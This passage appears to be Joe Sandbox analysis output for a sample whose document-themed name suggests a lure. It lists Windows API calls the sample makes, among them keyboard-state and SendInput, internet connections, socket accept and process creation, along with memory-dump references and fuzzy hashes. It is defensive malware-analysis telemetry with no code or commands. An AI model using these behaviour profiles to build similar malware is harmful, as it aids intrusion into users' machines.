                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                            • String ID:
                                                                                            • API String ID: 432972143-0
                                                                                            • Opcode ID: 8247a87fcaa5583e9becd8aef1d40694318126bf3ff0cbf3c91f0fef113fd0d5
                                                                                            • Instruction ID: 3f523c666d1038f2683c1d00e54544b418e6173fc5bee5378df37e2924346184
                                                                                            • Opcode Fuzzy Hash: 8247a87fcaa5583e9becd8aef1d40694318126bf3ff0cbf3c91f0fef113fd0d5
                                                                                            • Instruction Fuzzy Hash: 05412470A44208AEEF248B64C80ABFDBBBDAB59314F04011AF4E1972D1CBF48E85D761
                                                                                            APIs
                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0010E742
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0010E768
                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0010E78D
                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0010E7B9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 3321077145-0
                                                                                            • Opcode ID: 6cf2dd95570e1ab5c50fb51dda286640865619fcd7e418792faf3a4e29c21e28
                                                                                            • Instruction ID: 8ef396cc6de5958c603d07309a38fcbe8af46d01a353737e5eaadeca0f3cb408
                                                                                            • Opcode Fuzzy Hash: 6cf2dd95570e1ab5c50fb51dda286640865619fcd7e418792faf3a4e29c21e28
                                                                                            • Instruction Fuzzy Hash: 9E41153A600610DFCF11EF15C445A8DBBE5BF99720B098499F946AB3A2CB70FD40CB91
                                                                                            APIs
                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0012B5D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: InvalidateRect
                                                                                            • String ID:
                                                                                            • API String ID: 634782764-0
                                                                                            • Opcode ID: 7cc1fc4e6f311a470481a043da273a013964386c318c3664af6734ce0730ebbc
                                                                                            • Instruction ID: 666d30d85e88f95b9e62e5aff7c944911d0e56d9854b89668f80f68d8b5dc33d
                                                                                            • Opcode Fuzzy Hash: 7cc1fc4e6f311a470481a043da273a013964386c318c3664af6734ce0730ebbc
                                                                                            • Instruction Fuzzy Hash: AB31E074608224BFEF248F18FCC9FE837A5EB06310F644111FA51DA6E1D730AAA09B51
                                                                                            APIs
                                                                                            • ClientToScreen.USER32(?,?), ref: 0012D807
                                                                                            • GetWindowRect.USER32(?,?), ref: 0012D87D
                                                                                            • PtInRect.USER32(?,?,0012ED5A), ref: 0012D88D
                                                                                            • MessageBeep.USER32(00000000), ref: 0012D8FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1352109105-0
                                                                                            • Opcode ID: 771d43aa30959fc70bc1b8bfea08af2aad8ed9779dbc281d0181a8e1293e5a29
                                                                                            • Instruction ID: ed1372c1da0f94438894ce01a60f6af24e9ef24c2e4e2f10e9c1817a8b464b29
                                                                                            • Opcode Fuzzy Hash: 771d43aa30959fc70bc1b8bfea08af2aad8ed9779dbc281d0181a8e1293e5a29
                                                                                            • Instruction Fuzzy Hash: B941BB75A00228EFCF15DF58F884BA9BBF5FF49311F2981A9E9548B260D730E991CB40
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00103AB8
                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00103AD4
                                                                                            • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00103B34
                                                                                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00103B92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                            • String ID:
                                                                                            • API String ID: 432972143-0
                                                                                            • Opcode ID: 5ac9cc9f45c607ecdd433c2f94c93293b93e989b91222db004351040f930fc29
                                                                                            • Instruction ID: 3c5db45c7652d2b0c1c98aca4597c86030108eb4fd84ff2410fa93b50c2458cb
                                                                                            • Opcode Fuzzy Hash: 5ac9cc9f45c607ecdd433c2f94c93293b93e989b91222db004351040f930fc29
                                                                                            • Instruction Fuzzy Hash: FD312630A40258AEEF248B64C819BFE7BBD9B56318F04415AF4D1A72D1CBF48F85D761
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000F4038
                                                                                            • __isleadbyte_l.LIBCMT ref: 000F4066
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000F4094
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000F40CA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                            • String ID:
                                                                                            • API String ID: 3058430110-0
                                                                                            • Opcode ID: b41b934ba85c6c7ac3a34f4e7d22712335c8e70bfa56dff4238b8b5a22360fd9
                                                                                            • Instruction ID: f6b895e03ec8c8a8d6cd04011b57cf852e84478a4cdb3069665d19b721599a17
                                                                                            • Opcode Fuzzy Hash: b41b934ba85c6c7ac3a34f4e7d22712335c8e70bfa56dff4238b8b5a22360fd9
                                                                                            • Instruction Fuzzy Hash: 8531AF3160024AEFDB219F65C844BBB7BE5BF41310F154428EF659B9A1EB31D890EB90
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32 ref: 00127CB9
                                                                                              • Part of subcall function 00105F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00105F6F
                                                                                              • Part of subcall function 00105F55: GetCurrentThreadId.KERNEL32 ref: 00105F76
                                                                                              • Part of subcall function 00105F55: AttachThreadInput.USER32(00000000,?,0010781F), ref: 00105F7D
                                                                                            • GetCaretPos.USER32(?), ref: 00127CCA
                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00127D03
                                                                                            • GetForegroundWindow.USER32 ref: 00127D09
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                            • String ID:
                                                                                            • API String ID: 2759813231-0
                                                                                            • Opcode ID: a8a6b95aa1dca3d3df9fbd0db2ee663a0411ce6df6f6b3b61caee7d0b9213991
                                                                                            • Instruction ID: 43e2dd10907056d7267e885102ac968e9abc105f9a6ec07c9057b6d0476d151d
                                                                                            • Opcode Fuzzy Hash: a8a6b95aa1dca3d3df9fbd0db2ee663a0411ce6df6f6b3b61caee7d0b9213991
                                                                                            • Instruction Fuzzy Hash: 43311E75900208AFDB00EFA5D8459EFFBF9EF54314B108466E815E3211DB319E458FA0
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • GetCursorPos.USER32(?), ref: 0012F211
                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0013E4C0,?,?,?,?,?), ref: 0012F226
                                                                                            • GetCursorPos.USER32(?), ref: 0012F270
                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0013E4C0,?,?,?), ref: 0012F2A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2864067406-0
                                                                                            • Opcode ID: 32769e833b25aa874ed2f7d75a47ba61754f82c6d99e50cce7db02a76a30a392
                                                                                            • Instruction ID: 51372ef0d761a4c6ff52712ff5cfa3379674673c44c508e5d6fa27d816d13645
                                                                                            • Opcode Fuzzy Hash: 32769e833b25aa874ed2f7d75a47ba61754f82c6d99e50cce7db02a76a30a392
                                                                                            • Instruction Fuzzy Hash: 42218039600128EFCB159F94E858EEE7BB9EF0A750F144079F9054B6A1D7309EA2DB60
                                                                                            APIs
                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00114358
                                                                                              • Part of subcall function 001143E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00114401
                                                                                              • Part of subcall function 001143E2: InternetCloseHandle.WININET(00000000), ref: 0011449E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00128AA6
                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00128AC0
                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00128ACE
                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00128ADC
                                                                                            Similarity
                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00118AE0
                                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00118AF2
                                                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00118AFF
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118B16
                                                                                            Similarity
                                                                                            • API ID: ErrorLastacceptselect
                                                                                            • String ID:
                                                                                            APIs
                                                                                              • Part of subcall function 00101E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00100ABB,?,?,?,0010187A,00000000,000000EF,00000119,?,?), ref: 00101E77
                                                                                              • Part of subcall function 00101E68: lstrcpyW.KERNEL32(00000000,?,?,00100ABB,?,?,?,0010187A,00000000,000000EF,00000119,?,?,00000000), ref: 00101E9D
                                                                                              • Part of subcall function 00101E68: lstrcmpiW.KERNEL32(00000000,?,00100ABB,?,?,?,0010187A,00000000,000000EF,00000119,?,?), ref: 00101ECE
                                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0010187A,00000000,000000EF,00000119,?,?,00000000), ref: 00100AD4
                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,0010187A,00000000,000000EF,00000119,?,?,00000000), ref: 00100AFA
                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0010187A,00000000,000000EF,00000119,?,?,00000000), ref: 00100B2E
                                                                                            Similarity
                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                            • String ID: cdecl
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 000F2FB5
                                                                                              • Part of subcall function 000E395C: __FF_MSGBANNER.LIBCMT ref: 000E3973
                                                                                              • Part of subcall function 000E395C: __NMSG_WRITE.LIBCMT ref: 000E397A
                                                                                              • Part of subcall function 000E395C: RtlAllocateHeap.NTDLL(01910000,00000000,00000001,00000001,00000000,?,?,000DF507,?,0000000E), ref: 000E399F
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_free
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001005AC
                                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001005C7
                                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001005DD
                                                                                            • FreeLibrary.KERNEL32(?), ref: 00100632
                                                                                            Similarity
                                                                                            • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00106733
                                                                                            • _memset.LIBCMT ref: 00106754
                                                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001067A6
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 001067AF
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                            • String ID:
                                                                                            APIs
                                                                                              • Part of subcall function 000FAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000FAA79
                                                                                              • Part of subcall function 000FAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000FAA83
                                                                                              • Part of subcall function 000FAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000FAA92
                                                                                              • Part of subcall function 000FAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000FAA99
                                                                                              • Part of subcall function 000FAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000FAAAF
                                                                                            • GetLengthSid.ADVAPI32(?,00000000,000FADE4,?,?), ref: 000FB21B
                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000FB227
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 000FB22E
                                                                                            • CopySid.ADVAPI32(?,00000000,?), ref: 000FB247
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 000FB498
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000FB4AA
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000FB4C0
                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000FB4DB
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 000DB5A5
                                                                                            • GetClientRect.USER32(?,?), ref: 0013E69A
                                                                                            • GetCursorPos.USER32(?), ref: 0013E6A4
                                                                                            • ScreenToClient.USER32(?,?), ref: 0013E6AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                            • String ID:
                                                                                            • API String ID: 4127811313-0
                                                                                            • Opcode ID: 84db3b66d3b76b4b8d3dcb5fa25144a04a109b66ae46d13119bc23f08360c1a9
                                                                                            • Instruction ID: 8d76919203c3c3daed8ed3891a743c0470c4539f87d5081642c013adf30703fd
                                                                                            • Opcode Fuzzy Hash: 84db3b66d3b76b4b8d3dcb5fa25144a04a109b66ae46d13119bc23f08360c1a9
                                                                                            • Instruction Fuzzy Hash: C0113676900229FBCF10DF94E8469EE7BB8EB09304F110452F941E7651D730AA92CBB1
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00107352
                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00107385
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0010739B
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001073A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 2880819207-0
                                                                                            • Opcode ID: 3d5430719ebdd2f49570c3de3c91300e9ba35f558e60f4d36b9fd4c32ef72d6c
                                                                                            • Instruction ID: 6b1fee6f1a672da386eb5b0ac185e0d3840dd35921241d278bedb63070307b93
                                                                                            • Opcode Fuzzy Hash: 3d5430719ebdd2f49570c3de3c91300e9ba35f558e60f4d36b9fd4c32ef72d6c
                                                                                            • Instruction Fuzzy Hash: 53110476E04204BFDB119FA8EC09E9E7BAEAB45720F044355F921D32E1D7B09E4087A0
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000DD1BA
                                                                                            • GetStockObject.GDI32(00000011), ref: 000DD1CE
                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 000DD1D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3970641297-0
                                                                                            • Opcode ID: adeabbe1cadf990b2f0e4edb9225932b7a9bb488e6ab0302fc2647d29a481156
                                                                                            • Instruction ID: 1c4c2528afa711444af205272bff346a83ac5c164c279606056a763b1fe39f2c
                                                                                            • Opcode Fuzzy Hash: adeabbe1cadf990b2f0e4edb9225932b7a9bb488e6ab0302fc2647d29a481156
                                                                                            • Instruction Fuzzy Hash: 8E11ADB6101609BFEF124FA09C50EEABBA9FF09364F040103FA1452260D7319DA09BA0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                            • String ID:
                                                                                            • API String ID: 3016257755-0
                                                                                            • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                            • Instruction ID: f9986cf4312e69b49a725566b0cd29dd9d3120931cfc5036e7c7c9ccc1f635c7
                                                                                            • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                            • Instruction Fuzzy Hash: 4A01493604014EBBCF625E88DC118EE3F67BB18355B588455FF2899831D336DAB2BB81
                                                                                            APIs
                                                                                              • Part of subcall function 000E7A0D: __getptd_noexit.LIBCMT ref: 000E7A0E
                                                                                            • __lock.LIBCMT ref: 000E748F
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 000E74AC
                                                                                            • _free.LIBCMT ref: 000E74BF
                                                                                            • InterlockedIncrement.KERNEL32(01935F60), ref: 000E74D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                            • String ID:
                                                                                            • API String ID: 2704283638-0
                                                                                            • Opcode ID: f0ba755ecc8c8ea8f4a28a4fa18858309f5faede5d23c851227330eaf4134d4d
                                                                                            • Instruction ID: 9213070f7da5d0b25a7a695cee45eac2bf02e5c4c870e52bdb858eb168f3cb82
                                                                                            • Opcode Fuzzy Hash: f0ba755ecc8c8ea8f4a28a4fa18858309f5faede5d23c851227330eaf4134d4d
                                                                                            • Instruction Fuzzy Hash: 8501C4719066519FD766AF66A40579DBBB0BF44710F144009F41C77AD1CB305981DFD2
                                                                                            APIs
                                                                                            • __lock.LIBCMT ref: 000E7AD8
                                                                                              • Part of subcall function 000E7CF4: __mtinitlocknum.LIBCMT ref: 000E7D06
                                                                                              • Part of subcall function 000E7CF4: EnterCriticalSection.KERNEL32(00000000,?,000E7ADD,0000000D), ref: 000E7D1F
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 000E7AE5
                                                                                            • __lock.LIBCMT ref: 000E7AF9
                                                                                            • ___addlocaleref.LIBCMT ref: 000E7B17
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                            • String ID:
                                                                                            • API String ID: 1687444384-0
                                                                                            • Opcode ID: e6f684f40e881dd12dcd305323011cedc6ff8988539b229fd16bc59f26ad3776
                                                                                            • Instruction ID: 0737913e02750772498fa092eb3d91890463521a7701be3534fd8c763be8e2e0
                                                                                            • Opcode Fuzzy Hash: e6f684f40e881dd12dcd305323011cedc6ff8988539b229fd16bc59f26ad3776
                                                                                            • Instruction Fuzzy Hash: DB016D71504B40EFD730DF76D90578AB7F0AF50321F20890EE49AA76A2CBB0A680CB01
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 0012E33D
                                                                                            • _memset.LIBCMT ref: 0012E34C
                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00183D00,00183D44), ref: 0012E37B
                                                                                            • CloseHandle.KERNEL32 ref: 0012E38D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3277943733-0
                                                                                            • Opcode ID: 6398448b6dfa5cd601ff68027b5b7a0249d7b2fdbe70377ba5f4a61d4a480929
                                                                                            • Instruction ID: 02c86797a41ac7489cd2aba3cc2ca255853addea66c7d0616584dd4c90b93be8
                                                                                            • Opcode Fuzzy Hash: 6398448b6dfa5cd601ff68027b5b7a0249d7b2fdbe70377ba5f4a61d4a480929
                                                                                            • Instruction Fuzzy Hash: 2BF0BEF0100304BEE2002BE1AC45FB77E5CEB04F50F444120FE08E65A2D3B19F8087A8
                                                                                            APIs
                                                                                              • Part of subcall function 000DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 000DAFE3
                                                                                              • Part of subcall function 000DAF83: SelectObject.GDI32(?,00000000), ref: 000DAFF2
                                                                                              • Part of subcall function 000DAF83: BeginPath.GDI32(?), ref: 000DB009
                                                                                              • Part of subcall function 000DAF83: SelectObject.GDI32(?,00000000), ref: 000DB033
                                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0012EA8E
                                                                                            • LineTo.GDI32(00000000,?,?), ref: 0012EA9B
                                                                                            • EndPath.GDI32(00000000), ref: 0012EAAB
                                                                                            • StrokePath.GDI32(00000000), ref: 0012EAB9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                            • String ID:
                                                                                            • API String ID: 1539411459-0
                                                                                            • Opcode ID: 014b23ccd0409170030de629a5224798a4e2eaf8d1f1965343c3d4e5ea3e129a
                                                                                            • Instruction ID: 85e5148813c2bbad29d2034016960570a715000ceecf0a0156d04e06153dc44e
                                                                                            • Opcode Fuzzy Hash: 014b23ccd0409170030de629a5224798a4e2eaf8d1f1965343c3d4e5ea3e129a
